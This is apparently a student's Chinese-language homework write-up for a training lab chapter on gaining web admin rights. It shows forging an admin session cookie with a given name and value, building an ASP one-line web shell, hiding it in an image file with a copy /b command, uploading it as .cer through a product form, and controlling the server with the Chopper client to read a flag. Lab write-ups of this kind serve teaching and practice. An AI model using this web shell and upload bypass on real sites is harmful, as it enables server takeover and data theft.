tester作业提交（靶场第五章：进击！拿到Web最高权限！）

一、Cookie伪造：

1. 点击传送门

2. 进入目标页：http://120.203.13.75:8002/admin/Login.asp

3. 鼠标邮件点击目标页面，点击检查，打开开发者工具

4. 点击Application

5. 展开点击Cookies，选择当前SERVER_NAME，在右侧红框中双击，

输入上一题获得的管理员Cookie：

Name输入ADMINSESSIONIDCSTRCSDQ

Value输入LBMLMBCCNPFINOANFGLPCFBC

6. 点击目标页准备好了吗链接或者直接刷新当前页面

7. 进入网站管理后台

通过伪造cookie获的管理员登陆权限后，就要在后台找个上传点，从而将木马上传到服务器

二、准备一句话木马：<%eval request ("pass")%>，保存为1.asp（因为当前页面是用asp做的），注意文本编辑器的编码格式选择UTF-8

转成图片马:

在CMD中输入下边的语句

copy 1.jgp/b+1.asp 1.cer

三、在产品管理->产品管理中编辑产品，红框中上传准备好的图片马1.cer

四、通过菜刀访问到服务器查看服务器文件,页面空白处，右键菜单中选择添加

地址：http://120.203.13.75:8002/UploadFiles/2018829814851.cer地址后边的空格中输入：pass脚本类型：ASP(Eval)

点击添加

五、成功 后，列表中有一条新增的记录

双击这条新增的记录，进入服务器

在E:5\FLAG!.txt中拿到Flag：zkz{*************}